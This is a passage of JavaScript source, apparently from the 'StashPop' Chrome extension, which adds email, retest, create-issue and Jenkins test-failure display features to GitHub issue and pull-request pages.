this.style.backgroundColor = "#77ccff"; }); return; } } // Default background color $(".comment-form-head:visible").each(function () { this.style.backgroundColor = "#f7f7f7"; }); }); }); var config = { attributes: true, childList: true, characterData: true }; observer.observe(target, config); } function reloadJenkins(firstRun, currentSettings) { if (!firstRun) { log("Deleting inlined Jenkins data"); $('.' + jenkinsReloadableInfoClassName).remove(); } addTestFailureButtonsAndDescriptions(currentSettings); if (currentSettings[option_jenkinsShowRunTime]) { addJenkinsTestRunTimes(); } if (currentSettings[option_jenkinsShowRunTime] || currentSettings[option_jenkinsShowFailureIndications] || currentSettings[option_jenkinsShowBugFilingButton] || currentSettings[option_jenkinsShowRetestButton]) { addJenkinsRefreshButton(currentSettings); } } // Globals var currentPageFullUrl; var postDomainUrlParts; var currentPageOrg; var currentPageRepo; var isIndividualItemPage; var individualItemPageTitleElement; var isListPage; var itemListElement; function resetGlobals() { log("Resetting globals"); log("Clearing old globals"); currentPageFullUrl = null; postDomainUrlParts = null; currentPageOrg = null; currentPageRepo = null; isIndividualItemPage = null; individualItemPageTitleElement = null; isListPage = null; itemListElement = null; log("Setting new globals"); currentPageFullUrl = window.location.href; log("currentPageFullUrl: " + currentPageFullUrl); var urlParts = normalizeAndRemoveUrlParameters(currentPageFullUrl).split("/"); var indexOfGitHubDotCom = -1; for (var i = 0; i < urlParts.length; i++) { if (urlParts[i].indexOf("github.com") > -1) { indexOfGitHubDotCom = i; break; } } if (indexOfGitHubDotCom > -1) { postDomainUrlParts = urlParts.slice(indexOfGitHubDotCom + 1, urlParts.length); log("postDomainUrlParts: " + postDomainUrlParts.toString()); var org = urlParts[indexOfGitHubDotCom + 1]; var repo = urlParts[indexOfGitHubDotCom + 2]; log("ASDF" + repo); if (typeof org !== "undefined") { if (org == "pulls") { // Personal pulls page: github.com/pulls... // Handled below, but don't treat "pulls" as the organization } else { // Organization sub-page: github.com/dotnet... currentPageOrg = org; } } log("currentPageOrg: " + currentPageOrg); if (typeof repo !== "undefined") { // Repository sub-page: github.com/dotnet/roslyn... currentPageRepo = repo; } log("currentPageRepo: " + currentPageRepo); individualItemPageTitleElement = document.getElementsByClassName("js-issue-title")[0]; isIndividualItemPage = typeof individualItemPageTitleElement !== 'undefined'; log("isIndividualItemPage: " + isIndividualItemPage); itemListElement = document.getElementsByClassName("table-list-issues")[0]; isListPage = typeof itemListElement !== 'undefined'; log("isListPage: " + isListPage); } } function logfailure(err) { log("ERROR - " + err); log("ERROR STACK - " + err.stack); } function log(message) { console.log("StashPop: " + message); } function addButtonsToIndividualItemPage(title, number, isPull, currentSettings) { if ((isPull && currentSettings[option_emailPullRequest]) || (!isPull && currentSettings[option_emailIssue])) { var buttonsContainer = document.createElement("div"); buttonsContainer.setAttribute("class", stashPopClassName); var emailButton = createButtonWithCallBack( isPull ? "Email PR" : "Email Issue", function () { log("Email Item clicked"); sendmail(number, title, isPull); }); buttonsContainer.appendChild(emailButton); if (!isPull) { var workItemButton = createButtonWithCallBack( "Copy as WorkItem Attribute", function () { log("Copy as WorkItem Attribute clicked"); copyTextToClipboard('<WorkItem(' + number + ', "' + window.location.href + '")>'); }); workItemButton.style.margin = "0px 0px 0px 4px"; buttonsContainer.appendChild(workItemButton); } individualItemPageTitleElement.parentNode.appendChild(buttonsContainer); } } function addButtonsToListPage(isPull, currentSettings) { if ((isPull && currentSettings[option_emailPullRequestList]) || (!isPull && currentSettings[option_emailIssuesList])) { var numberOfCheckedItemsElement = document.getElementsByClassName("js-check-all-count")[0]; if (typeof numberOfCheckedItemsElement !== "undefined") { var buttonAll = createButtonWithCallBack( "Email Selected " + (isPull ? "PRs" : "Issues"), function () { log("Email Selected Items clicked"); sendmultimail(itemListElement, isPull); }); buttonAll.className = "btn btn-sm"; numberOfCheckedItemsElement.parentNode.insertBefore(buttonAll, numberOfCheckedItemsElement.parentNode.firstChild); } for (var i = 0; i < itemListElement.children.length; i++) { var itemElement = itemListElement.children[i]; var titleElement = itemElement.getElementsByClassName("issue-title")[0]; var urlParts = titleElement.getElementsByClassName("issue-title-link")[0].href.split("/"); var issueNumber = urlParts[urlParts.length - 1]; var issueTitle = titleElement.getElementsByClassName("issue-title-link")[0].innerHTML; (function () { var _issueNumber = issueNumber; var _issueTitle = issueTitle; var emailButton = createButtonWithCallBack( isPull ? "Email PR" : "Email Issue", function () { log("Email Item clicked"); sendmail(_issueNumber, _issueTitle, isPull); }); emailButton.className = "btn btn-sm " + stashPopClassName; titleElement.insertBefore(emailButton, titleElement.firstChild); })(); } } if (isPull && currentSettings[option_jenkinsOfferInlineFailuresOnPRList]) { log("Handling failures in PR list"); var failureTitles = new Array(); var failureClassNames = new Array(); var failureIndices = new Array(); for (var i = 0; i < itemListElement.children.length; i++) { var itemElement = itemListElement.children[i]; if (typeof itemElement.getElementsByClassName("octicon-x")[0] !== "undefined") { // PR with failures log("Found a failure"); var titleElement = itemElement.getElementsByClassName("issue-title")[0]; var pullRequestElement = itemElement.getElementsByClassName("issue-title")[0]; // On github.com/pulls there are two "issue-title-link" elements. The first is for the repo, the second for the issue. // Get the issue number, then add the repo qualifier if necessary. var pullRequestUrlParts = pullRequestElement.getElementsByClassName("issue-title-link js-navigation-open")[0].href.split("/"); log("PR Request Parts: " + pullRequestUrlParts.toString()); var pullRequestNumber = pullRequestUrlParts[pullRequestUrlParts.length - 1]; log("In PR #" + pullRequestNumber); var pullRequestRepo = ""; if (currentPageOrg == null) { var prOrg = pullRequestUrlParts[pullRequestUrlParts.length - 4]; var prRepo = pullRequestUrlParts[pullRequestUrlParts.length - 3]; pullRequestRepo = prOrg + "_ClassNameFriendlySeparator_" + prRepo; log("In Repo: " + pullRequestRepo); } var pullRequestIdentifier = pullRequestRepo + pullRequestNumber; log("Failure identifier: " + pullRequestIdentifier); var showJenkinsFailureLink = document.createElement("a"); showJenkinsFailureLink.href = "#"; var className = "loadjenkinsfailure" + pullRequestIdentifier; showJenkinsFailureLink.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " " + className; showJenkinsFailureLink.text = "Show Jenkins failure"; showJenkinsFailureLink.style.color = 'red'; log("titleElement:" + titleElement); log("showJenkinsFailureLink:" + showJenkinsFailureLink); titleElement.appendChild(showJenkinsFailureLink); failureTitles.push(titleElement); failureClassNames.push(className); failureIndices.push(i); (function () { var _titleElement = titleElement; var _className = className; var _i = i; log("Hooking up click event for class " + _className); $('.' + _className).click(function (e) { e.preventDefault(); log("Click - Load Jenkins Failure for #" + _className.substring("loadjenkinsfailure".length)); inlineFailureInfoToPRList(_titleElement, _className, _i, currentSettings); }); })(); } } if (failureTitles.length >= 1) { var headerStates = document.getElementsByClassName("table-list-header-toggle states")[0]; var loadAllFailuresLink = document.createElement("a"); loadAllFailuresLink.href = "#"; loadAllFailuresLink.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " loadalljenkinsfailures"; loadAllFailuresLink.text = "Show all Jenkins failures"; loadAllFailuresLink.style.color = 'red'; headerStates.appendChild(loadAllFailuresLink); $('.loadalljenkinsfailures').click(function (e) { log("Click - Load All Jenkins Failures") e.preventDefault(); for (var i = 0; i < failureTitles.length; i++) { inlineFailureInfoToPRList(failureTitles[i], failureClassNames[i], failureIndices[i], currentSettings); } }); } } } function createCommentSettingLink(title, comment, color) { return createLinkWithCallBack( title, function () { var commentText = comment + "\n"; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); return false; }, color); } function createLinkWithCallBack(title, callback, color) { color = color || "#4078c0"; var a = document.createElement("a"); a.text = title; a.role = "button"; a.href = ""; a.style.marginRight = "5px"; a.style.color = color; a.onclick = callback; return a; } function createRequestJenkinsAccessLinkWithCallbackIfAllowed(url, callback) { return createLinkWithCallBack( "Grant StashPop access", function () { log("Allow/request access button clicked for " + url + ". Sending request..."); executeCallbackIfUrlAccessGranted(url, callback); return false; }); } function executeCallbackIfUrlAccessGranted(url, callback) { log("Requesting access for " + url + "..."); chrome.runtime.sendMessage({ method: "requestOriginAccess", keys: [url] }, function (response) { if (response) { log(" Access granted. Executing callback."); callback(); } else { log(" Access denied."); } }); } function createButtonWithCallBack(title, callback) { var button = document.createElement("input"); button.setAttribute("type", "button"); button.setAttribute("value", title); button.onclick = callback; return button; } // Copy provided text to the clipboard. function copyTextToClipboard(text) { var copyFrom = $('<textarea/>'); copyFrom.text(text); $('body').append(copyFrom); copyFrom.select(); document.execCommand('copy'); copyFrom.remove(); } // TODO: Only scrape once between this and addTestFailureButtonsAndDescriptions function addJenkinsTestRunTimes() { var testRuns = document.getElementsByClassName("build-status-item"); for (var i = 0; i < testRuns.length; i++) { var run = testRuns[i]; var detailsLink = run.getElementsByClassName("build-status-details")[0]; if (typeof detailsLink === 'undefined') { continue; } var textToUpdate = run.getElementsByClassName("text-muted")[0]; var loading = document.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var specificClassName = stashPopClassName + "_TestRunTime_" + i; loading.className = stashPopClassName + " " + specificClassName; textToUpdate.appendChild(loading); (function (_run, _url, _specificClassName) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _url, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var header = doc.getElementsByClassName("build-caption page-headline")[0]; if (typeof header === "undefined") { $('.' + _specificClassName).remove(); return; } var timestamp = header.innerText.split("(")[1].split(")")[0]; var timestampMoment = moment(timestamp); var dayCount = moment().diff(timestampMoment, 'days', true); var backgroundColor = "#000000"; if (dayCount <= 2) { backgroundColor = "#AAFFAA"; } // green else if (dayCount <= 5) { backgroundColor = "#FFC85A"; } // yellow else { backgroundColor = "#FFAAAA"; } // red $('.' + _specificClassName).remove(); var textToUpdate = _run.getElementsByClassName("text-muted")[0]; var span = document.createElement("span"); span.innerHTML = "(" + timestampMoment.fromNow() + ")"; span.style.backgroundColor = backgroundColor; span.setAttribute("title", timestamp + "\n\nGreen: < 2 days\nYellow: 2 to 5 days\nRed: > 5 days"); span.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; textToUpdate.appendChild(span); }); })(run, detailsLink.href, specificClassName); } } function addTestFailureButtonsAndDescriptions(currentSettings) { if (currentSettings[option_jenkinsShowBugFilingButton] || currentSettings[option_jenkinsShowRetestButton] || currentSettings[option_jenkinsShowFailureIndications]) { processTestFailures( document, null, 0, currentSettings["jenkinsShowBugFilingButton"], currentSettings["jenkinsShowFailureIndications"], currentSettings["jenkinsShowTestFailures"], currentSettings["jenkinsShowRetestButton"], function (x, y, z, w) { }, currentSettings); } } function processTestFailures(doc, prLoadingDiv, rowNumber, jenkinsShowBugFilingButton, jenkinsShowFailureIndications, jenkinsShowTestFailures, jenkinsShowRetestButton, callbackWhenTestProcessed, currentSettings) { var testFailures = doc.getElementsByClassName("octicon-x build-status-icon"); if (typeof prLoadingDiv !== "undefined" && prLoadingDiv !== null) { // Delete the existing loading icon while (prLoadingDiv.firstChild) { prLoadingDiv.removeChild(prLoadingDiv.firstChild); } // Drop in a bunch of new loading icons for (var i = 0; i < testFailures.length; i++) { var isDropdown = false; var ancestor = testFailures[i]; while ((ancestor = ancestor.parentElement) != null) { if (ancestor.classList.contains("dropdown-menu")) { isDropdown = true; break; } } if (isDropdown) { continue; } var div = document.createElement("div"); var specificClassName = stashPopClassName + "_ActualTestFailureHolder_" + rowNumber + "_" + i; div.className = stashPopClassName + " " + specificClassName; div.style.color = "#000000"; var loading = doc.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var testFailure = testFailures[i]; var queueName = testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var t = document.createTextNode("Processing failed queue '" + queueName + "'..."); div.appendChild(loading); div.appendChild(t); prLoadingDiv.appendChild(div); } } if (!isListPage) { var nonDefaultTestInfo = currentSettings[option_nonDefaultTestInfo]; var nonDefaultTests = nonDefaultTestInfo.trim().match(/[^\r\n]+/g); var relevantNonDefaultTests = new Array(); log("Calculating relevant non-default test suites...") for (var i = 0; i < nonDefaultTests.length; i++) { log(" Considering: " + nonDefaultTests[i]) var specParts = nonDefaultTests[i].trim().split(":"); if (specParts.length == 2 || specParts.length == 3) { var scope = specParts[0].trim(); var testToRun = specParts[1].trim(); var runIfNotAlreadyRun = specParts.length == 3 ? specParts[2].trim() : testToRun; var scopeParts = scope.trim().split("/"); if (scopeParts.length == 1 || scopeParts.length == 2) { var orgToMatch = scopeParts[0].trim(); if (orgToMatch == currentPageOrg) { var repoToMatch = scopeParts.length == 2 ? scopeParts[1].trim() : ""; if (scopeParts.length == 1 || repoToMatch == currentPageRepo) { log(" It matches, adding mapping from " + runIfNotAlreadyRun + " to " + testToRun); relevantNonDefaultTests[runIfNotAlreadyRun] = testToRun; } } } } } var nonDefaultTestCount = 0; for (var key in relevantNonDefaultTests) { nonDefaultTestCount++; } log("relevantNonDefaultTests length: " + nonDefaultTestCount); log("Removing already-run tests...") var buildStatusList = $(".build-statuses-list:visible")[0]; if (typeof buildStatusList !== "undefined") { for (var i = 0; i < buildStatusList.children.length; i++) { var individualStatus = buildStatusList.children[i]; var queueName = individualStatus.getElementsByTagName("strong")[0].innerText.trim(); log(" Trying to delete: " + queueName); delete relevantNonDefaultTests[queueName]; } nonDefaultTestCount = 0; for (var key in relevantNonDefaultTests) { nonDefaultTestCount++; } log("Updated relevantNonDefaultTests length: " + nonDefaultTestCount); if (nonDefaultTestCount > 0) { var additionalJobsDiv = doc.createElement("div"); additionalJobsDiv.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; var t = document.createTextNode("Run non-default tests: "); additionalJobsDiv.appendChild(t); for (var key in relevantNonDefaultTests) { var value = relevantNonDefaultTests[key]; (function () { var jobName = value; var jobButton = createButtonWithCallBack( jobName, function () { var commentText = "retest " + jobName + " please\n"; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); }); jobButton.className = "btn btn-sm"; additionalJobsDiv.appendChild(jobButton); })(); } buildStatusList.previousSibling.previousSibling.appendChild(additionalJobsDiv); } } } for (var i = 0; i < testFailures.length; i++) { var isDropdown = false; var ancestor = testFailures[i]; while ((ancestor = ancestor.parentElement) != null) { if (ancestor.classList.contains("dropdown-menu")) { isDropdown = true; break; } } if (isDropdown) { continue; } var testFailure = testFailures[i]; var testFailUrl = testFailure.parentNode.getElementsByClassName("build-status-details")[0].href; var queueName = testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var loading = doc.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var specificClassNameForJenkinsFailureRedAreaLoader = stashPopClassName + "_TestFailures_" + i; loading.className = stashPopClassName + " " + specificClassNameForJenkinsFailureRedAreaLoader; testFailure.parentNode.insertBefore(loading, testFailure.parentNode.firstChild); var specificClassNameForPRListFailure = stashPopClassName + "_ActualTestFailureHolder_" + rowNumber + "_" + i; (function (_testFailure, _testFailUrl, _specificClassNameForPRListFailure, _specificClassNameForJenkinsFailureRedAreaLoader, _queueName) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _testFailUrl, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); var h2elements = doc.getElementsByTagName("h2"); var aelements = doc.getElementsByTagName("a"); var url = window.location.href; var urlParts = url.split("/"); var pullNumber = urlParts[urlParts.length - 1]; var pullTitle = ""; if (typeof document.getElementsByClassName("js-issue-title")[0] !== "undefined") { pullTitle = document.getElementsByClassName("js-issue-title")[0].innerText.trim(); } var pullAuthor = ""; if (typeof document.getElementsByClassName("pull-header-username")[0] !== "undefined") { pullAuthor = document.getElementsByClassName("pull-header-username")[0].innerText.trim(); } var issueBody = "PR: [#" + pullNumber + "](" + url + ") *" + pullTitle + "* by @" + pullAuthor + "\r\n"; issueBody = issueBody + "Failure: " + _testFailUrl + "\r\n\r\n"; var htmlDescription = ""; var issueDescription = "<description>"; if (jenkinsShowFailureIndications) { if (jenkinsShowTestFailures) { for (var i = 0; i < aelements.length; i++) { var aelement = aelements[i]; if (aelement.innerText == "Test Result" && aelement.parentNode.tagName == "TD") { var unitTestFailures = aelement.parentNode.getElementsByTagName("li"); if (unitTestFailures.length > 0) { if (unitTestFailures.length <= 10) { htmlDescription = htmlDescription + "<b>" + unitTestFailures.length + " Test Failures:</b><br />"; issueBody = issueBody + "**" + unitTestFailures.length + " Test Failures:**\r\n"; } else { htmlDescription = htmlDescription + "<b>" + unitTestFailures.length + " Test Failures:</b> (showing first 10)<br />"; issueBody = issueBody + "**" + unitTestFailures.length + " Test Failures:** (showing first 10)\r\n"; } } for (var j = 0; j < unitTestFailures.length && j < 10; j++) { var unitTestFailure = unitTestFailures[j]; htmlDescription = htmlDescription + "&nbsp;&nbsp;&nbsp;&nbsp;" + unitTestFailure.innerText + "<br />"; issueBody = issueBody + unitTestFailure.innerText + "\r\n"; } htmlDescription = htmlDescription + "<br />"; issueBody = issueBody + "\r\n"; } } } var count = 1; for (var i = 0; i < h2elements.length; i++) { var h2 = h2elements[i]; if (h2.innerHTML == "HTTP ERROR 404") { htmlDescription = htmlDescription + "404: Build details page could not be found."; issueDescription = "404: Build details page could not be found."; } if (h2.innerHTML == "Identified problems") { var nodeWithErrorSiblings = h2.parentNode.parentNode; var errorRow = nodeWithErrorSiblings; while ((errorRow = errorRow.nextSibling) != null) { if (count > 1) { issueBody = issueBody + "\r\n\r\n"; htmlDescription = htmlDescription + "<br /><br />"; } var failureTitle = ""; var failureDescription = ""; var h3s = errorRow.getElementsByTagName("h3"); var h4s = errorRow.getElementsByTagName("h4"); if (h3s.length > 0) { failureTitle = h3s[0].innerHTML.split("<br")[0].trim(); failureDescription = h3s[0].getElementsByTagName("b")[0].innerHTML.trim(); } else if (h4s.length > 0) { failureTitle = h4s[0].innerHTML.trim(); failureDescription = h4s[1].innerHTML.trim(); } if (count == 1) { issueDescription = failureTitle; } issueBody = issueBody + "**Issue " + count + ": " + failureTitle + "**\r\n"; issueBody = issueBody + failureDescription; htmlDescription = htmlDescription + "<b>Issue " + count + ": " + failureTitle + "</b><br />" + failureDescription; count++; } } } if (count > 2) { issueDescription = issueDescription + " (+" + (count - 2) + " more)"; } if (count == 1) { // we failed to find the failure, or there was none. // should we add special handling here? } } var testQueueName = _testFailure.parentNode.getElementsByClassName("text-emphasized")[0].innerText.trim(); var issueTitle = "[Test Failure] " + issueDescription + " in " + testQueueName + " on PR #" + pullNumber; var issueCreationRouting = currentSettings[option_issueCreationRouting]; var issueRoutes = issueCreationRouting.trim().match(/[^\r\n]+/g); var targetOrg = currentPageOrg; var targetRepo = currentPageRepo; for (var routeNum = 0; routeNum < issueRoutes.length; routeNum++) { var routeParts = issueRoutes[routeNum].trim().split(":"); var fromParts = routeParts[0].trim().split("/"); var toParts = routeParts[1].trim().split("/"); if (fromParts.length == 2 && toParts.length == 2 && fromParts[0].trim() == currentPageOrg && fromParts[1].trim() == currentPageRepo) { targetOrg = toParts[0].trim(); targetRepo = toParts[1].trim(); break; } } var previousFailureUrl = _testFailUrl; var defaultIssueLabelsSpecs = currentSettings[option_defaultIssueLabels].trim().match((/[^\r\n]+/g)); log("Determining issue labels...") var labelsToUse = new Array(); for (var specNum = 0; specNum < defaultIssueLabelsSpecs.length; specNum++) { log(" Checking: " + defaultIssueLabelsSpecs[specNum]); var specParts = defaultIssueLabelsSpecs[specNum].trim().split(":"); var scopeParts = specParts[0].split("/"); var organization = scopeParts[0].trim(); if (organization == currentPageOrg) { if (scopeParts.length == 1 || scopeParts[1].trim() == currentPageRepo) { var labelList = specParts[1].trim().split(","); log(" Matches. Adding " + labelList.toString()); for (var labelNum = 0; labelNum < labelList.length; labelNum++) { labelName = labelList[labelNum].trim(); if (!(labelName in labelsToUse)) { log(" Actually adding: " + labelName); labelsToUse.push(labelName); } } } } } log("Calculated labelsToUse: " + labelsToUse); // "&labels[]=Area-Infrastructure&labels[]=Contributor%20Pain" var labelUrlPart = ""; if (labelsToUse.length > 0) { for (var labelNum = 0; labelNum < labelsToUse.length; labelNum++) { labelUrlPart = labelUrlPart + "&labels[]=" + labelsToUse[labelNum]; } } log("Constructed labels url part: " + labelUrlPart); var url = "https://github.com/" + targetOrg + "/" + targetRepo + "/issues/new?title=" + encodeURIComponent(issueTitle) + "&body=" + encodeURIComponent(issueBody) + labelUrlPart; var jobName = testQueueName; var retestButton = doc.createElement("input"); retestButton.setAttribute("type", "button"); retestButton.setAttribute("value", "Retest"); retestButton.setAttribute("name", "buttonname"); retestButton.onclick = (function () { var thisUrl = url; var thisJobName = jobName; var thisPreviousFailureUrl = previousFailureUrl; return function () { log("Finding retest text"); var rerunTextEntries = currentSettings[option_testRerunText].trim().match((/[^\r\n]+/g)); // * = 1, org = 2, repo = 3 var bestMatchLevel = 0; var descriptor = "retest {0} please"; for (var rerunTextNum = 0; rerunTextNum < rerunTextEntries.length; rerunTextNum++) { log(" Considering " + rerunTextEntries[rerunTextNum].trim()); var rerunEntryParts = rerunTextEntries[rerunTextNum].trim().split(":"); var scope = rerunEntryParts[0].trim(); var matchLevel = 0; var entryMatches = false; if (scope == "*") { matchLevel = 1; entryMatches = true; } else if (scope.indexOf("/") == -1) { matchLevel = 2; entryMatches = scope == currentPageOrg; } else { matchLevel = 3; var org = scope.split("/")[0]; var repo = scope.split("/")[1]; entryMatches = org == currentPageOrg && repo == currentPageRepo; } log(" Matches / Level: " + entryMatches + "/" + matchLevel); if (entryMatches && matchLevel > bestMatchLevel) { var descriptor = rerunEntryParts[1].trim(); log(" Setting new best match to: " + descriptor); } } log("Best-match retest text: " + descriptor); var commentText = ""; if (descriptor.indexOf("{0}") == -1) { commentText = descriptor; log(" No placeholder, so commentText is " + commentText); } else { var placeholderLocation = descriptor.indexOf("{0}"); var commentTextStart = descriptor.substr(0, placeholderLocation); var commentTextEnd = descriptor.substr(placeholderLocation + "{0}".length); var commentText = commentTextStart + thisJobName + commentTextEnd; log(" commentText with filled placeholder is " + commentText); } commentText = commentText + "\n// Previous failure: " + thisPreviousFailureUrl + "\n// Retest reason: "; $("#new_comment_field").val(commentText); var offset = $("#new_comment_field").offset(); offset.left -= 20; offset.top -= 20; $('html, body').animate({ scrollTop: offset.top, scrollLeft: offset.left }); $("#new_comment_field").stop().css("background-color", "#FFFF9C") .animate({ backgroundColor: "#FFFFFF" }, 1500); }; })(); retestButton.className = "btn btn-sm " + stashPopClassName + " " + jenkinsReloadableInfoClassName; retestButton.style.margin = "0px 0px 3px 0px"; if (jenkinsShowRetestButton) { _testFailure.parentNode.insertBefore(retestButton, _testFailure.parentNode.firstChild); } var button = doc.createElement("input"); button.setAttribute("type", "button"); button.setAttribute("value", "Create Issue"); button.setAttribute("name", "buttonname"); button.onclick = (function () { var thisUrl = url; return function () { window.open(thisUrl); }; })(); button.className = "btn btn-sm " + stashPopClassName + " " + jenkinsReloadableInfoClassName; button.style.margin = "0px 0px 3px 0px"; if (jenkinsShowBugFilingButton) { _testFailure.parentNode.insertBefore(button, _testFailure.parentNode.firstChild); } if (jenkinsShowFailureIndications) { executeCallbackIfPermissionPresent(_testFailUrl, function () { var div = doc.createElement("div"); if (typeof htmlDescription === "undefined" || htmlDescription == "") { htmlDescription = "Unknown Failure - If this is a private Jenkins job, click the 'Details' button to reauthenticate and then reload this failure data."; } div.innerHTML = htmlDescription.trim(); div.style.backgroundColor = "#FFAAAA"; div.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; _testFailure.parentNode.appendChild(div); }); } $("." + _specificClassNameForJenkinsFailureRedAreaLoader).remove(); callbackWhenTestProcessed(_queueName, _testFailUrl, htmlDescription, _specificClassNameForPRListFailure); }); })(testFailure, testFailUrl, specificClassNameForPRListFailure, specificClassNameForJenkinsFailureRedAreaLoader, queueName); } } function makeBuildStatusWindowsBig() { var lists = document.getElementsByClassName("build-statuses-list"); for (var i = 0; i < lists.length; i++) { lists[i].style.maxHeight = "5000px"; } } function addJenkinsRefreshButton(currentSettings) { var lists = $(".build-statuses-list"); for (var i = 0; i < lists.length; i++) { var list = lists[i]; var a = document.createElement("a"); a.href = "#"; a.className = stashPopClassName + " " + jenkinsReloadableInfoClassName + " jenkinsreload"; a.text = "Reload Jenkins data"; list.previousSibling.previousSibling.appendChild(a); } $('.jenkinsreload').click(function (e) { e.preventDefault(); reloadJenkins(currentSettings); }); } function normalizeAndRemoveUrlParameters(str) { str = stripFragment(str); str = stripQueryString(str); return stripTrailingSlash(str); } function stripTrailingSlash(str) { return str.substr(-1) === '/' ? str.substring(0, str.length - 1) : str; } function stripQueryString(str) { return str.indexOf('?') >= 0 ? str.substring(0, str.indexOf('?')) : str; } function stripFragment(str) { return str.indexOf('#') >= 0 ? str.substring(0, str.indexOf('#')) : str; } function inlineFailureInfoToPRList(title, className, i, currentSettings) { var clickToLoadText = title.getElementsByClassName(className)[0]; if (typeof clickToLoadText === "undefined") { // Already expanded. Don't re-expand. return; } $("." + className).remove(); log("Inlining Jenkins failures to PR list for " + className + " (position " + i + " on this page)"); // On github.com/pulls there are two "issue-title-link" elements. var thisFailureUrl = title.getElementsByClassName("issue-title-link js-navigation-open")[0].href; log("thisFailureUrl:" + thisFailureUrl); executeCallbackIfUrlAccessGranted(thisFailureUrl, function () { var redDiv = document.createElement("div"); redDiv.style.backgroundColor = "#FFAAAA"; redDiv.className = stashPopClassName + " " + jenkinsReloadableInfoClassName; var loading = document.createElement("img"); var imgUrl = chrome.extension.getURL("images/loading.gif"); loading.src = imgUrl; var prLoadingDiv = document.createElement("div"); prLoadingDiv.style.backgroundColor = "#FFAAAA"; prLoadingDiv.style.color = "#000000"; prLoadingDiv.appendChild(loading); var t = document.createTextNode("Loading PR contents..."); prLoadingDiv.appendChild(t); var specificClassName = stashPopClassName + "_LoadPRContents_" + i; prLoadingDiv.className = specificClassName; redDiv.appendChild(prLoadingDiv); (function (_thisFailureUrl, _divToAddTo, _prLoadingDiv) { chrome.runtime.sendMessage({ method: 'GET', action: 'xhttp', url: _thisFailureUrl, data: '' }, function (responseText) { var parser = new DOMParser(); var doc = parser.parseFromString(responseText, "text/html"); processTestFailures( doc, _prLoadingDiv, i, true, true, true, true, function (failurequeue, detailsurl, resultstr, classNameToPlaseResultsIn) { var divToPlaceResultsIn = document.getElementsByClassName(classNameToPlaseResultsIn)[0]; while (divToPlaceResultsIn.firstChild) { divToPlaceResultsIn.removeChild(divToPlaceResultsIn.firstChild); } var _individualFailureDiv = document.createElement("div"); var _span = document.createElement("span"); _span.innerHTML = "<b><u>" + failurequeue + "</u></b> <a href = '" + encodeURI(detailsurl) + "' target='_blank'>Details</a><br />"; _individualFailureDiv.appendChild(_span); var _nestedDiv = document.createElement("div"); _nestedDiv.style.padding = "0px 0px 0px 30px"; var _span2 = document.createElement("span"); _span2.innerHTML = resultstr + "<br /><br />"; _nestedDiv.appendChild(_span2); _individualFailureDiv.appendChild(_nestedDiv); _individualFailureDiv.style.color = "#000000"; divToPlaceResultsIn.appendChild(_individualFailureDiv); }, currentSettings); }); })(thisFailureUrl, redDiv, prLoadingDiv); title.appendChild(redDiv); }); } function executeCallbackIfPermissionPresent(url, callback) { log("Checking access for " + url + "..."); chrome.runtime.sendMessage({ method: "checkOriginAccess", keys: [url] }, function (response) { if (response) { log(" Permission present. Executing callback."); callback(); } else { log(" Permission missing."); } }); } function executeCallbackIfPermissionMissing(url, callback) { log("Checking access for " + url + "..."); chrome.runtime.sendMessage({ method: "checkOriginAccess", keys: [url] }, function (response) { if (response) { log(" Permission present."); } else { log(" Permission missing. Executing callback."); callback(); } }); } function openJenkinsDetailsInNewTab(currentSettings) { var detailsLinks = document.getElementsByClassName("build-status-details"); for (var i = 0; i < detailsLinks.length; i++) { var detailsLink = detailsLinks[i]; detailsLink.target = "_blank"; (function (_detailsLink) { executeCallbackIfPermissionMissing( detailsLink.href, function () { var grantAccessLink = createRequestJenkinsAccessLinkWithCallbackIfAllowed( _detailsLink.href, function () { reloadJenkins(false, currentSettings); return false; }); grantAccessLink.className = "build-status-details right"; _detailsLink.parentNode.insertBefore(grantAccessLink, _detailsLink.nextSibling); }) })(detailsLink); } } function addCodeReviewSummaryAndButtons(codeReviewOptions) { var splitCodeOptions = codeReviewOptions.split(";"); var positiveIndicatorsString = splitCodeOptions[1].trim(); var negativeIndicatorsString = splitCodeOptions[2].trim(); var testedIndicatorsString = splitCodeOptions[3].trim(); if (positiveIndicatorsString.length == 0 && negativeIndicatorsString.length == 0 && testedIndicatorsString.length == 0) { log("Empty code review options. Bail.") return; } // Buttons var btnList = document.getElementById("partial-new-comment-form-actions"); var text = document.createElement("font"); text.color = "#666666"; text.textContent = "Code Review: "; btnList.appendChild(text); var positiveIndicators = positiveIndicatorsString.split(","); var negativeIndicators = negativeIndicatorsString.split(","); var testedIndicators = testedIndicatorsString.split(","); if (positiveIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Approve", positiveIndicators[0], "#00aa00")); } if (negativeIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Reject", negativeIndicators[0], "#aa0000")); } if (testedIndicatorsString.length > 0) { btnList.appendChild(createCommentSettingLink("Tested", testedIndicators[0])); } // Reviews var positiveReviews = new Array(); var negativeReviews = new Array(); var testReviews = new Array(); var comments = document.getElementsByClassName("timeline-comment-wrapper"); for (var i = 0; i < comments.length; i++) { var comment = comments[i]; if 